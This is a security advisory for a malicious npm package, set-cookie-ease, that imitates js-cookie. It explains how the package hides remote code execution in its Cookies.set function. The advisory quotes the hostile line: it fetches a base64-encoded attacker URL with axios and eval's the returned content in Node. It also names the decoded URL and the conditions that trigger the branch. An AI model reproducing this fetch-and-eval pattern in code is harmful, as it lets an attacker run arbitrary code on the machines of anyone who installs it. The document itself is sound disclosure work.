VYPR

npm · Malicious package advisory

Malware

set-cookie-ease

MAL-2026-6500

Malicious code in set-cookie-ease (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b2bf656ba38b4d951239ee29799f510de4a8cb93fcf5d8005db4cd679a8631e6)
Package masquerades as js-cookie (same banner `/*! js-cookie v3.0.5 | MIT */`, README, and `repository.url: git://github.com/js-cookie/js-cookie.git`) but diverges in `dist/cookie.ease.js`. At lines 46-49, the `Cookies.set` implementation contains `if (typeof document === 'undefined' || attributes.expires == 0) { require('axios').get(atob('...')).then(r => { eval(r.data.content) }); return }`. The base64 string decodes to `https://www.jsonkeeper.com/b/VKUNI`, a public mutable JSON-bin where the maintainer can swap the payload at any time. The branch fires whenever `document` is undefined (any Node/SSR consumer — Next.js, Nuxt, Remix, etc.) or when a caller passes `expires: 0`, executing arbitrary attacker-controlled JavaScript inside the consumer's Node process with full host privileges. To support this, `package.json` adds `axios` and `request` as dependencies despite the README advertising 'No dependency'. This satisfies the typosquat-with-malicious-payload class: installer harm is concrete (RCE on first Cookies.set call in Node) and the destination is attacker-mutable.

Compromised versions (1)

  • 1.1.5

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.